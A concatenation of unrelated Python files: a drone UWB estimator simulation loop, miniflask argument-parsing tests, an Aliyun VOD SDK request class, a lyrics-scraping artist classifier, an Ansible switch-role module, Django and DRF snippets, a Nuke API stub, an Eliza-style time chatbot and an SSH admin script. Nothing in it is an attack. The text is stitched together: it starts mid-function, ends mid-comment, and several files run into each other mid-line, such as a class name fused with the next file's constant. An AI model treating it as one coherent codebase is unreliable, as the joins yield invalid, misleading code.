drone_full_x_log ###, drone_full_x_log2#, mhe_error_sum2 # wait a moment before starting error calculation (calibration) if drone.time > 1.0: x = drone.state_true.x[0] y = drone.state_true.x[1] z = drone.state_true.x[2] drone_flight_info = np.array( [np.hstack((drone.time, drone.state_estimate["ekf"].x[0:3], drone.state_true.x[0:3]))]) ###print("EKF X", drone.state_estimate["ekf"].x) ###print(np.transpose(drone.estimators["ekf"].xi[0:3])) drone_full_x_log[error_count] = drone_flight_info # drone_full_x_log = np.append(drone_full_x_log, drone_flight_info, axis=0) #######print(drone_full_x_log[-1]) ###drone_full_x_log2 = np.append(drone_full_x_log2, np.array(drone.time, np.transpose(drone.estimators["ekf"].xi[0:3])), axis=0) error_count += 1 """ if drone.estimator_isEnabled['mhe']: mhe_error_sum2[0] += (x - drone.state_estimate['mhe'].x[0])**2 mhe_error_sum2[1] += (y - drone.state_estimate['mhe'].x[1])**2 mhe_error_sum2[2] += (z - drone.state_estimate['mhe'].x[2])**2 """ if drone.estimator_isEnabled['ekf'] and z > 0.1: ekf_error_count += 1 ekf_error_sum2[0] += (x - drone.state_estimate['ekf'].x[0]) ** 2 ekf_error_sum2[1] += (y - drone.state_estimate['ekf'].x[1]) ** 2 ekf_error_sum2[2] += (z - drone.state_estimate['ekf'].x[2]) ** 2 for input_file in os.listdir(publication_folder): if "anchors_" in input_file: Na = int(input_file[8]) N_helpers = int(input_file[-7]) if N_helpers == 0: simulation_type = 0 else: simulation_type = 1 params.ranging.anchor_enable = [Na > 0, Na > 4, Na > 1, Na > 5, Na > 6, Na > 2, Na > 7, Na > 3] for folder in os.listdir(input_file): print('Reading from: {}'.format(os.path.join(input_file, folder))) print(os.path.join(data_folder, folder + ".csv")) params.drone.logfile = os.path.join(data_folder, folder + ".csv") params.drone.helper_file = os.path.join(input_file, folder) params.ranging.simulation_type = simulation_type f_out = open(os.path.join(input_file, folder, "DroneUser_runs_data" + str(simulation_type)) + ".csv", "w") f_out.write('log, anchors, run, ekf_tot, ekfX, ekfY, ekfZ, logfile\n') for run in range(runs_per_traj_file): # anchor_idx_en = random.sample(range(8), Na) # for a_idx in range(Na): # params.ranging.anchor_enable[a_idx] = True if simulation_type == 0: params.name = folder + '_SOLO' + '_r' + str(run) elif simulation_type == 1: params.name = folder + '_h' + str(N_helpers) + '_r' + str(run) # Reset error calculation error_count = 0 # mhe_error_sum2[0] = 0 # mhe_error_sum2[1] = 0 # mhe_error_sum2[2] = 0 ekf_error_sum2[0] = 0 ekf_error_sum2[1] = 0 ekf_error_sum2[2] = 0 # Reset drone x array drone_full_x_log = np.empty((60000, 7)) ###drone_full_x_log2 = np.empty((0,4)) # Run simulation sim = UWBSimulation(params, NotImplemented, data_callback) try: sim.start_sim() # mheX = np.sqrt(mhe_error_sum2[0]/error_count) # mheY = np.sqrt(mhe_error_sum2[1]/error_count) # mheZ = np.sqrt(mhe_error_sum2[2]/error_count) ekfX = np.sqrt(ekf_error_sum2[0] / error_count) ekfY = np.sqrt(ekf_error_sum2[1] / error_count) ekfZ = np.sqrt(ekf_error_sum2[2] / error_count) except AssertionError: # One of the estimators failed, try both individually # EKF only params.estimators.mhe.enable = False error_count = 0 ekf_error_sum2[0] = 0 ekf_error_sum2[1] = 0 ekf_error_sum2[2] = 0 try: sim = UWBSimulation(params, NotImplemented, data_callback) sim.start_sim() ekfX = np.sqrt(ekf_error_sum2[0] / error_count) ekfY = np.sqrt(ekf_error_sum2[1] / error_count) ekfZ = np.sqrt(ekf_error_sum2[2] / error_count) except AssertionError: ekfX = np.inf ekfY = np.inf ekfZ = np.inf finally: # params.estimators.mhe.enable = True pass # Calculate performance and write to output file # mhe_tot = np.sqrt(mheX**2 + mheY**2 + mheZ**2) ekf_tot = np.sqrt(ekfX ** 2 + ekfY ** 2 + ekfZ ** 2) f_out.write('{}, {}, {}, \ {:.5f}, {:.4f}, {:.4f}, {:.4f}, {}\n'.format( folder, Na, run, ekf_tot, ekfX, ekfY, ekfZ, os.path.join(input_file, folder) )) drone_full_x_log = drone_full_x_log[~np.all(drone_full_x_log == 0, axis=1)] np.savetxt(os.path.join(input_file, folder, "DroneUser_DronePosLog_SimType_" + str(simulation_type) + "_r" + str(run) + ".csv"), drone_full_x_log, header="time, estX, estY, estZ, trueX, trueY, trueZ", comments="", delimiter=",") ###np.save(os.path.join("C:\\Users\\<NAME>\\PycharmProjects\\numpytester\\savehere", ###"x_array" + str(Na) + str(run) + "BOO"), drone_full_x_log2) print("RUNTIME:", time.time() - start_time) f_out.close() <reponame>da-h/miniflask<filename>tests/argparse/list/test_argparse_list_overwrites.py from pathlib import Path import miniflask # noqa: [E402] def test_space(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--int1", "1337", "--int2", "-1337", "--float1", "1.234", "--float2", "-1.234", "--float3", "-0.0", "--float4", "0.0", "--float5", "3e5", "--float6", "-3e5", "--bool1", "False", "--bool2", "True", "--enum1", "small", "--str1", "abcd1234", "--str2", "αβγδ∀⇐Γ∂", "--str3", "" ]) captured = capsys.readouterr() mf.event.print_all() captured = capsys.readouterr() assert captured.out == """ modules.module1.int1: [1337] modules.module1.int2: [-1337] modules.module1.float1: [1.234] modules.module1.float2: [-1.234] modules.module1.float3: [-0.0] modules.module1.float4: [0.0] modules.module1.float5: [300000.0] modules.module1.float6: [-300000.0] modules.module1.bool1: [False] modules.module1.bool2: [True] modules.module1.enum1: [<SIZE.SMALL: 0>] modules.module1.str1: ['abcd1234'] modules.module1.str2: ['αβγδ∀⇐Γ∂'] modules.module1.str3: [''] """.lstrip() def test_equal(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--int1=1337", "--int2=-1337", "--float1=1.234", "--float2=-1.234", "--float3=-0.0", "--float4=0.0", "--float5=3e5", "--float6=-3e5", "--bool1=False", "--bool2=True", "--enum1=small", "--str1=abcd1234", "--str2=αβγδ∀⇐Γ∂", "--str3=" ]) captured = capsys.readouterr() mf.event.print_all() captured = capsys.readouterr() assert captured.out == """ modules.module1.int1: [1337] modules.module1.int2: [-1337] modules.module1.float1: [1.234] modules.module1.float2: [-1.234] modules.module1.float3: [-0.0] modules.module1.float4: [0.0] modules.module1.float5: [300000.0] modules.module1.float6: [-300000.0] modules.module1.bool1: [False] modules.module1.bool2: [True] modules.module1.enum1: [<SIZE.SMALL: 0>] modules.module1.str1: ['abcd1234'] modules.module1.str2: ['αβγδ∀⇐Γ∂'] modules.module1.str3: [''] """.lstrip() def test_bool_int(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--bool1=0", "--bool2=1", ]) captured = capsys.readouterr() mf.event.print_bool() captured = capsys.readouterr() assert captured.out == """ modules.module1.bool1: [False] modules.module1.bool2: [True] """.lstrip() def test_bool_yesno(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--bool1=no", "--bool2=yes", ]) captured = capsys.readouterr() mf.event.print_bool() captured = capsys.readouterr() assert captured.out == """ modules.module1.bool1: [False] modules.module1.bool2: [True] """.lstrip() def test_bool_tf(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--bool1=f", "--bool2=t", ]) captured = capsys.readouterr() mf.event.print_bool() captured = capsys.readouterr() assert captured.out == """ modules.module1.bool1: [False] modules.module1.bool2: [True] """.lstrip() def test_bool_truefalse(capsys): mf = miniflask.init( module_dirs=str(Path(__file__).parent / "modules"), debug=True ) mf.load("module1") mf.parse_args([ "--bool1=false", "--bool2=true", ]) captured = capsys.readouterr() mf.event.print_bool() captured = capsys.readouterr() assert captured.out == """ modules.module1.bool1: [False] modules.module1.bool2: [True] """.lstrip() from lltk.imports import * class TextGildedAge(Text): pass class GildedAge(Corpus): TEXT_CLASS = TextGildedAgeSIGNATURE_KEYS = ['signature', 'timestamp', 'nonce', 'echostr'] ENCRYPT_SIGNATURE_KEYS = ['signature', 'timestamp', 'nonce', 'msg_signature'] MSG_KEYS = ['ToUserName', 'FromUserName', 'MsgType', 'Content'] OTHER_MSG_TYPE = ['image', 'voice', 'video', 'shortvideo', 'location', 'link'] REPLY_STR = '''<xml> <ToUserName><![CDATA[%s]]></ToUserName> <FromUserName><![CDATA[%s]]></FromUserName> <CreateTime>%s</CreateTime> <MsgType><![CDATA[text]]></MsgType> <Content><![CDATA[%s]]></Content> </xml>''' def reply_template(fr, to, time, reply): return REPLY_STR % (fr, to, time, reply) # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from aliyunsdkcore.request import RpcRequest from aliyunsdkvod.endpoint import endpoint_data class SubmitSnapshotJobRequest(RpcRequest): def __init__(self): RpcRequest.__init__(self, 'vod', '2017-03-21', 'SubmitSnapshotJob','vod') if hasattr(self, "endpoint_map"): setattr(self, "endpoint_map", endpoint_data.getEndpointMap()) if hasattr(self, "endpoint_regional"): setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional()) def get_ResourceOwnerId(self): return self.get_query_params().get('ResourceOwnerId') def set_ResourceOwnerId(self,ResourceOwnerId): self.add_query_param('ResourceOwnerId',ResourceOwnerId) def get_UserData(self): return self.get_query_params().get('UserData') def set_UserData(self,UserData): self.add_query_param('UserData',UserData) def get_SpecifiedOffsetTime(self): return self.get_query_params().get('SpecifiedOffsetTime') def set_SpecifiedOffsetTime(self,SpecifiedOffsetTime): self.add_query_param('SpecifiedOffsetTime',SpecifiedOffsetTime) def get_SpriteSnapshotConfig(self): return self.get_query_params().get('SpriteSnapshotConfig') def set_SpriteSnapshotConfig(self,SpriteSnapshotConfig): self.add_query_param('SpriteSnapshotConfig',SpriteSnapshotConfig) def get_SnapshotTemplateId(self): return self.get_query_params().get('SnapshotTemplateId') def set_SnapshotTemplateId(self,SnapshotTemplateId): self.add_query_param('SnapshotTemplateId',SnapshotTemplateId) def get_Height(self): return self.get_query_params().get('Height') def set_Height(self,Height): self.add_query_param('Height',Height) def get_ResourceOwnerAccount(self): return self.get_query_params().get('ResourceOwnerAccount') def set_ResourceOwnerAccount(self,ResourceOwnerAccount): self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount) def get_Count(self): return self.get_query_params().get('Count') def set_Count(self,Count): self.add_query_param('Count',Count) def get_VideoId(self): return self.get_query_params().get('VideoId') def set_VideoId(self,VideoId): self.add_query_param('VideoId',VideoId) def get_OwnerId(self): return self.get_query_params().get('OwnerId') def set_OwnerId(self,OwnerId): self.add_query_param('OwnerId',OwnerId) def get_Width(self): return self.get_query_params().get('Width') def set_Width(self,Width): self.add_query_param('Width',Width) def get_FileUrl(self): return self.get_query_params().get('FileUrl') def set_FileUrl(self,FileUrl): self.add_query_param('FileUrl',FileUrl) def get_Interval(self): return self.get_query_params().get('Interval') def set_Interval(self,Interval): self.add_query_param('Interval',Interval)import threading _thread_locals = threading.local() def set_current_user(user): _thread_locals.user = user def get_current_user(): return getattr(_thread_locals, 'user', None) def remove_current_user(): _thread_locals.user = None#!/usr/bin/env python # coding: utf-8 # # Project: Lyrics Classifier # Workflow # 1- Get lyrics from the web # 2- Clean the list of songs (with spacy) # 3- Vectorize the clean list # 4- Transform the list # 5- Apply the model (NB, Logistic Regression, etc..) import requests from bs4 import BeautifulSoup as soup import numpy as np import os import pandas as pd import spacy import sys from sklearn.feature_extraction.text import CountVectorizer from sklearn.feature_extraction.text import TfidfTransformer from sklearn.pipeline import make_pipeline from sklearn.naive_bayes import MultinomialNB from sklearn.model_selection import train_test_split # -------------------------------------------------------- # Class # ------------------------------------------------------- class Artist: def __init__(self, name): self.name = name self.newname = "" self.web = "" self.song = "" self.songtext = "" self.title = "" def get_links_artist(self): """ Find all the links for a given artist where songs can be found and store the links in a list """ page_list=[] # Adjust the name of the artist artist_name = self.name.lower() if artist_name.startswith("the"): artist_name = artist_name.replace('the','') artist_name = artist_name.replace(' ','-') artist_name = artist_name[1:] else: artist_name = artist_name.replace(' ','-') self.newname = artist_name # Look for the lyrics in metrolyrics.com link_str = 'https://www.metrolyrics.com/' + artist_name + '-lyrics.html' artist_request = requests.get(link_str) artist_soup = soup(artist_request.text,'html.parser') page_tag = artist_soup.find_all(attrs={"class":"pages"}) if len(page_tag) == 0: page_tag = artist_soup.find_all('a',attrs={"class":"active"}) page_list.append(page_tag[0].get('href')) else: for each in page_tag[0].find_all('a'): #print(each.get('href')) page_list.append(each.get('href')) file_name = "Songs/" + artist_name + "_link_pages.csv" np.savetxt(file_name, page_list,delimiter=",", fmt='%s') self.web = self.newname + "_link_pages.csv" return None def get_links_songs(self): page_list = [] for line in open("Songs/"+ self.web): csv_row = line.split() art = requests.get(csv_row[0]) art_soup = soup(art.text,'html.parser') song_tag = art_soup.find_all('tbody') for each in song_tag[0].find_all('a',attrs={"class":"title hasvidtable"}): page_list.append(each.get('href')) for each in song_tag[0].find_all('a',attrs={"class":"title"}): page_list.append(each.get('href')) file_name = "Songs/" + self.newname + "_link_songs.csv" np.savetxt(file_name, page_list,delimiter=",", fmt='%s') self.song = self.newname + "_link_songs.csv" return None def get_song_lyrics(self): """ Read the file with the song links, read the text of the song and save it in a list Save also a list with the titles of the songs """ song_list = [] title_list = [] for line in open("Songs/" + self.song ): csv_row = line.split() art = requests.get(csv_row[0]) art_soup = soup(art.text,'html.parser') song_tag = art_soup.find_all(attrs={"class":"lyrics-body"}) mySong = "" for each in song_tag[0].find_all('p',class_="verse"): mySong = mySong + " " + each.text.replace('\n', ' ') #Find the title myTitle = art_soup.find_all('h1') mySong.strip() if (mySong.find('instrumental') == -1): song_list.append(mySong) title_list.append(myTitle[0].text) #Save the song text in a file df = pd.DataFrame(data=song_list) file_name = "Songs/" + self.newname + "_songs_text.csv" df.to_csv(file_name, sep=',',index=False,header=None) #Save the song titles in a file df = pd.DataFrame(data=title_list) file_name = "Songs/" + self.newname + "_songs_title.csv" df.to_csv(file_name, sep=',',index=False,header=None) self.songtext = self.newname + "_songs_text.csv" self.title = self.newname + "_songs_title.csv" return None # --------------------------------------------------------------- # ## General functions # -------------------------------------------------------------- def create_Artist(artist_name): a = Artist(artist_name) a.get_links_artist() a.get_links_songs() a.get_song_lyrics() return a def clean_song_list(reg_list,model): """ Input a list of strings - in this case the songs - and return the clean list of songs """ clean_song_list = [] for string in reg_list: doc = model(string) clean_text = '' for word in doc: if not word.is_stop and word.lemma_ != '-PRON-' and word.pos_ != 'PUNCT': word = word.lemma_ clean_text += word + ' ' clean_song_list.append(clean_text) return clean_song_list def create_df_artist_song(art): """ Read the text of all songs saved in csv files and create a DataFrame with text song and titles """ file_name_text = "Songs/" + art.songtext df_text = pd.read_csv(file_name_text,names=["Text"]) file_name_title = "Songs/" + art.title df_title = pd.read_csv(file_name_title,names=["Title"]) #print(df_text.shape) #print(df_title.shape) df = pd.concat([df_title, df_text],axis=1) df.dropna(inplace=True) df['Artist'] = art.name #print(df.shape) return df def create(name,art_nr): artist = create_Artist(name) #print(artist.name) df = create_df_artist_song(artist) #print("create df artist song") file_name = "Songs/all_artists_songs.csv" if art_nr < 1: df.to_csv(file_name, sep=',',index=False) else: df_all = pd.read_csv(file_name,names=['Title','Text','Artist']) os.remove(file_name) df2 = pd.concat([df_all, df]) #Save again to csv df2.to_csv(file_name, sep=',',index=False,header=None) return # -------------------------- # __main__ # -------------------------- if __name__ =="__main__": all_artists = [] all_artists_df = pd.DataFrame() if os.path.exists("Songs/all_artists_songs.csv"): os.remove("Songs/all_artists_songs.csv") while True: data = input("Enter an artist: \n") if len(data)==0: #print("No more artists") break else: all_artists.append(data) check_text = input("Enter a text and I'll predict the artist: \n") print(".....\n") print("Program starts...") # convert input into a list list_check_text = [check_text] # Create all my artist print("Creating artists...") final_artist_list=[] for l in all_artists: try: create(l,all_artists.index(l)) final_artist_list.append(l) except Exception as e: print(f"Can't find songs from {l}") # Concatenate all artists df--> done in my function #df_all = pd.concat(final_artist_list) # Create a df with all songs of all artists df_all = pd.read_csv("Songs/all_artists_songs.csv",names=['Title','Text','Artist'],skiprows=1) df_all.set_index('Title',inplace=True) #Convert text lyrics column into list list_text = df_all['Text'].tolist() print("Cleaning song lyrics..") # Clean song lyrics model = spacy.load('en_core_web_md') new_clean=clean_song_list(list_text,model) # Create new df with title, clean text and artist number df_clean = pd.DataFrame(index=df_all.index) df_clean['Artist'] =df_all['Artist'] df_clean['Text'] = new_clean #art_fac = pd.factorize(df_all['Artist']) #df_clean['Artist_Cat']=art_fac[0] # ## The Tf-Idf Transformer pipeline = make_pipeline( CountVectorizer(), TfidfTransformer(), MultinomialNB() #alpha=0.0000001 --> unigeness of words super important ) #y = [a1.name] * df1.shape[0] + [a2.name] * df2.shape[0] y = df_clean['Artist'] X = np.array(df_clean['Text']) X_train, X_test, y_train, y_test = train_test_split(X,y,random_state=42) print("Fitting the model...") pipeline.fit(X_train,y_train) #print(f"My model score is: {pipeline.score(X_test,y_test).round(2)}") #pipeline.fit(X,y) print("Predicting artist...\n") result = pipeline.predict_proba(list_check_text) #print(result) print(f"The artist is: {final_artist_list[result.argmax()]}") <reponame>gvashchenkolineate/gvashchenkolineate_infra_trytravis #!/usr/bin/python # Copyright: (c) 2018, Pluribus Networks # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = """ --- module: pn_role author: "Pluribus Networks (@rajaspachipulusu17)" version_added: "2.8" short_description: CLI command to create/delete/modify role description: - This module can be used to create, delete and modify user roles. options: pn_cliswitch: description: - Target switch to run the CLI on. required: false type: str state: description: - State the action to perform. Use C(present) to create role and C(absent) to delete role and C(update) to modify role. required: true type: str choices: ['present', 'absent', 'update'] pn_scope: description: - local or fabric. required: false type: str choices: ['local', 'fabric'] pn_access: description: - type of access. required: false type: str choices: ['read-only', 'read-write'] pn_shell: description: - allow shell command. required: false type: bool pn_sudo: description: - allow sudo from shell. required: false type: bool pn_running_config: description: - display running configuration of switch. required: false type: bool pn_name: description: - role name. required: true type: str pn_delete_from_users: description: - delete from users. required: false type: bool """ EXAMPLES = """ - name: Role create pn_role: pn_cliswitch: 'sw01' state: 'present' pn_name: 'foo' pn_scope: 'local' pn_access: 'read-only' - name: Role delete pn_role: pn_cliswitch: 'sw01' state: 'absent' pn_name: 'foo' - name: Role modify pn_role: pn_cliswitch: 'sw01' state: 'update' pn_name: 'foo' pn_access: 'read-write' pn_sudo: true pn_shell: true """ RETURN = """ command: description: the CLI command run on the target node. returned: always type: str stdout: description: set of responses from the role command. returned: always type: list stderr: description: set of error responses from the role command. returned: on error type: list changed: description: indicates whether the CLI caused changes on the target. returned: always type: bool """ from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.network.netvisor.pn_nvos import pn_cli, run_cli, booleanArgs from ansible.module_utils.network.netvisor.netvisor import run_commands def check_cli(module, cli): """ This method checks for idempotency using the role-show command. If a role with given name exists, return True else False. :param module: The Ansible module to fetch input parameters :param cli: The CLI string """ role_name = module.params['pn_name'] cli += ' role-show format name no-show-headers' out = run_commands(module, cli)[1] if out: out = out.split() return True if role_name in out else False def main(): """ This section is for arguments parsing """ state_map = dict( present='role-create', absent='role-delete', update='role-modify' ) module = AnsibleModule( argument_spec=dict( pn_cliswitch=dict(required=False, type='str'), state=dict(required=True, type='str', choices=state_map.keys()), pn_scope=dict(required=False, type='str', choices=['local', 'fabric']), pn_access=dict(required=False, type='str', choices=['read-only', 'read-write']), pn_shell=dict(required=False, type='bool'), pn_sudo=dict(required=False, type='bool'), pn_running_config=dict(required=False, type='bool'), pn_name=dict(required=False, type='str'), pn_delete_from_users=dict(required=False, type='bool'), ), required_if=( ["state", "present", ["pn_name", "pn_scope"]], ["state", "absent", ["pn_name"]], ["state", "update", ["pn_name"]], ), ) # Accessing the arguments cliswitch = module.params['pn_cliswitch'] state = module.params['state'] scope = module.params['pn_scope'] access = module.params['pn_access'] shell = module.params['pn_shell'] sudo = module.params['pn_sudo'] running_config = module.params['pn_running_config'] name = module.params['pn_name'] delete_from_users = module.params['pn_delete_from_users'] command = state_map[state] # Building the CLI command string cli = pn_cli(module, cliswitch) ROLE_EXISTS = check_cli(module, cli) cli += ' %s name %s ' % (command, name) if shell is (False or '') and sudo is True: module.fail_json( failed=True, msg='sudo access requires shell access' ) if command == 'role-modify': if ROLE_EXISTS is False: module.fail_json( failed=True, msg='Role with name %s does not exist' % name ) if command == 'role-delete': if ROLE_EXISTS is False: module.exit_json( skipped=True, msg='Role with name %s does not exist' % name ) if command == 'role-create': if ROLE_EXISTS is True: module.exit_json( skipped=True, msg='Role with name %s already exists' % name ) if scope: cli += ' scope ' + scope if command != 'role-delete': if access: cli += ' access ' + access cli += booleanArgs(shell, 'shell', 'no-shell') cli += booleanArgs(sudo, 'sudo', 'no-sudo') cli += booleanArgs(running_config, 'running-config', 'no-running-config') if command == 'role-modify': if delete_from_users: cli += ' delete-from-users ' + delete_from_users run_cli(module, cli, state_map) if __name__ == '__main__': main() # Django from django.conf.urls import url from dashboardHealthProfessional.views import (HomeHealthProfessional, ChartData) urlpatterns = ( url(r'^health_professional/$', HomeHealthProfessional.as_view(), name='dashboard_hp'), url(r'^ajax/chart_data/$', ChartData.as_view(), name='chart_data') ) from prefect.environments.execution import ( Environment, DaskKubernetesEnvironment, FargateTaskEnvironment, KubernetesJobEnvironment, LocalEnvironment, RemoteEnvironment, RemoteDaskEnvironment, ) <filename>jobs/api/serializers.py from rest_framework import serializers from jobs.models import Job class JobListSerializer(serializers.ModelSerializer): class Meta: model = Job fields = [ "title", "slug", "description", "jobcategory", "job_url", "thumbnail", "publish", ] class JobDetailSerializer(serializers.ModelSerializer): class Meta: model = Job fields = "__all__" <filename>hw4/proofs/Exceptions.py class ParseException(Exception): def __init__(self, line, expected, got): self.line = line self.expected = expected self.got = got def __str__(self): return "Error at %d: expected %s, but got %s" % (self.line, self.expected, self.got) class LexException(Exception): def __init__(self, line, got): self.line = line self.got = got def __str__(self): return "Error at %d: invalid symbol %c" % (self.line, self.got) class SubException(Exception): def __init__(self, node): self.node = node def __str__(self): return "Error: sub not implemented for " + self.node class ProofException(Exception): def __init__(self, rule, expr, reason, proof): self.rule = rule self.expr = expr self.reason = reason self.proof = proof def print(self): self.proof.print_proof() print("Error: proof rule %s can't be applies to %s, because %s" % (self.rule, str(self.expr), self.reason)) <gh_stars>1-10 from numbers import Number from typing import * import nuke from . import * class Undo(object): """ Undo """ def __hash__(self, ): """ Return hash(self). """ return None def __new__(self,*args, **kwargs): """ Create and return a new object. See help(type) for accurate signature. """ return None def begin(self,*args, **kwargs): """ Begin a new user-visible group of undo actions. """ return None def name(self,*args, **kwargs): """ Name current undo set. """ return None def end(self,*args, **kwargs): """ Complete current undo set and add it to the undo list. """ return None def new(self,*args, **kwargs): """ Same as end();begin(). """ return None def cancel(self,*args, **kwargs): """ Undoes any actions recorded in the current set and throws it away. """ return None def undoSize(self,*args, **kwargs): """ Number of undo's that can be done. """ return None def redoSize(self,*args, **kwargs): """ Number of redo's that can be done. """ return None def undoTruncate(self,*args, **kwargs): """ Destroy any undo's greater or equal to n. """ return None def redoTruncate(self,*args, **kwargs): """ Destroy any redo's greater or equal to n. """ return None def undoDescribe(self,*args, **kwargs): """ Return short description of undo n. """ return None def redoDescribe(self,*args, **kwargs): """ Return short description of redo n. """ return None def undoDescribeFully(self,*args, **kwargs): """ Return long description of undo n. """ return None def redoDescribeFully(self,*args, **kwargs): """ Return long description of redo n. """ return None def undo(self,*args, **kwargs): """ Undoes 0'th undo. """ return None def redo(self,*args, **kwargs): """ Redoes 0'th redo. """ return None def disable(self,*args, **kwargs): """ Prevent recording undos until matching enable() """ return None def enable(self,*args, **kwargs): """ Undoes the previous disable() """ return None def disabled(self,*args, **kwargs): """ True if disable() has been called """ return None def __enter__(self,*args, **kwargs): """ """ return None def __exit__(self,*args, **kwargs): """ """ return None def __init__(self, *args, **kwargs): """ Initialize self. See help(type(self)) for accurate signature. """ return Noneimport re, csv, random from datetime import datetime CHATLOG = "chatLog.txt" # constant -> file name for chat log psychobable = [ [r'(W|w)hat time is it in (.*)\?', ["The current time in {location} is: {time}.", "In {location} it is {time}." ] ], [r'What time is it\?', ["The current time is: {time}.", "It is {time}." ] ], [r'(P|p)ut (an|a)\s?(.*) alarm(!|\.)', [ "Setting a {timer} alarm.", "Alarm set for {timer}." ] ], [r'(S|s)et (an|a)\s?(.*) alarm(!|\.)', [ "Setting a {timer} alarm.", "Alarm set for {timer}." ] ], [r'(S|s)et an alarm for (.*)(!|\.)', [ "Alarm set for {timer}." ] ], [r'(C|c)an you give me the time in (.*)\?', [ "The time in {location} is {time}." ] ], [r'(A|a)ctivate a (.*)timer(\.|!)', [ "Timer activated." ] ], [r'(.*)', [ "Sorry I can't help you with that.", "There seems to be a issue with your request.", "Sorry I do not understand your request...", "I do not know what you are asking of me...", "I am unable to understand what you mean by that." ] ] ] class Eliza: def __init__(self): # initialization of class Eliza with empty lists self.initials = [] # list of greetings of the chatbot self.finals = [] # list of final words of the chatbot self.quits = [] # list of words to quit talking to the chatbot def load(self, filePath): # method load # parameters: self # filePath -> file containing initials, finals and quits with open(filePath) as file: for line in file: if not line.strip(): continue tag, content = [part.strip() for part in line.split(':')] if tag == 'initial': self.initials.append(content) elif tag == 'final': self.finals.append(content) elif tag == 'quit': self.quits.append(content) def randInitial(self): # return random initial return random.choice(self.initials) def randFinal(self): # return random final return random.choice(self.finals) def respond(self, text): # method by which Eliza responds # parameters: self, # text -> some input by user # retuns: output -> some response by Eliza based on psychobable output = None if text.lower() in self.quits: # to quit return output output = self.analyze(text) # analyze text and respond accordingly return output def analyze(self, statement): # method to analyze the user input # parameters: self, # statement -> user input # returns: responds -> based on psychobable for pattern, responses in psychobable: match = re.match(pattern, statement) # match user input with psychobable regex if match: response = random.choice(responses) # respond with one of the possible responses zone = 'Luxembourg' # zone default is Luxembourg alarm = '0 seconds' # alarm default is 0 seconds for g in match.groups(): if containsDigit(g): # determine if the user wants to set an alarm or know the time alarm = g else: zone = g return response.format(time=getLocalTime(zone), location=zone, timer=alarm) def run(self): # method to converse with the user # loop is broken with key quit words # method records conversation in a chatlog initial = self.randInitial() # start conversation with a greeting file = open(CHATLOG, 'w') file.write('Bot: \t' + initial) # Currently we override the file at each program execution file.close() print(initial) # print greeting on console while True: # wait for user reply sent = input('> ') logChat(CHATLOG,sent,'Human: ') output = self.respond(sent) # determine what to respond if output is None: break print(output) logChat(CHATLOG,output, 'Bot: ') final = self.randFinal() # Terminate the conversation with a goodbye print(final) logChat(CHATLOG,final, 'Bot: ') def containsDigit(string): # function to determine if a given string contains a number # returns true if string contains at least one digit else false for character in string: if character.isdigit(): return True return False def getLocalTime(zone): # function to get UTC-time and # add the timezone delta extracted of a given zone from a csv file to it. # returns local time for a given zone/city, # expressed in hours:minutes:seconds with open("timeZone.csv",'r',newline='\n') as csvfile: reader = csv.reader(csvfile) utcDelta = 0 # default delta utcTime = datetime.utcnow().time() # current UTC-time for row in reader: if zone == row[0]: # match first csv argument with given zone utcDelta = row[1] # extract delta from file return '{H}:{M}:{S}'.format(H = str((int(utcTime.hour) + int(utcDelta))%24).zfill(2), M = str(utcTime.minute).zfill(2), S = str(utcTime.second).zfill(2)) # add delta to UTC-time def logChat(filePath, line, actor): # method logChat # attributes: # filePath -> where to save the conversation, # line -> line to be saved, # actor -> defines which actor said line with open(filePath, 'a') as file: file.write('\n'+actor+'\t'+line) def main(): eliza = Eliza() # initialize the class with empty values eliza.load('initialsFinals.txt') # load initials, finals and quit keywords eliza.run() # run Eliza chatbot if __name__ == '__main__': main()#! /usr/bin/env python import argparse import concurrent.futures import logging import os import re import shutil import socket import subprocess import sys from pathlib import Path import yaml ENDPOINT_REGEX = re.compile(r"(\w+://)\d+\.\d+\.\d+\.\d+(:\d+)") SCRIPT_DIR = Path(__file__).resolve().parent logger = logging.getLogger(__name__) def check_output(*args, verbose=False, **kwargs): if "universal_newlines" not in kwargs: kwargs["universal_newlines"] = True if "check" not in kwargs: kwargs["check"] = True try: return subprocess.run(*args, **kwargs, stdout=subprocess.PIPE).stdout except subprocess.CalledProcessError as error: if verbose: raise else: logger.error(error) sys.exit(1) def get_users(path: Path): with open(path) as yaml_file: users = yaml.load(yaml_file, Loader=yaml.Loader) if not users: users = [] return users def _barnum(host, user=None, bailey_args=None, dry_run=False, bailey_cmd="bailey"): if user: logger.debug(f"Processing {user}@{host}") else: logger.debug(f"Processing {host}") if host != socket.gethostname(): cmd = ["ssh", "-x", "-o", "LogLevel=error", host, f"PATH={os.environ.get('VIRTUAL_ENV')}/bin:$PATH", bailey_cmd] else: cmd = [bailey_cmd] if user: cmd.append(user) if bailey_args is not None: cmd.extend(bailey_args) if dry_run: return f"DRY RUN; would execute: {' '.join(cmd)}" else: logger.debug(f"bailey cmd: {' '.join(cmd)}") return check_output(cmd, verbose="--verbose" in bailey_args) def barnum_multi_thread(hosts, bailey_args=None, dry_run=False, bailey_cmd="bailey"): with concurrent.futures.ThreadPoolExecutor(max_workers=len(hosts)) as executor: # Start threads; create dict of 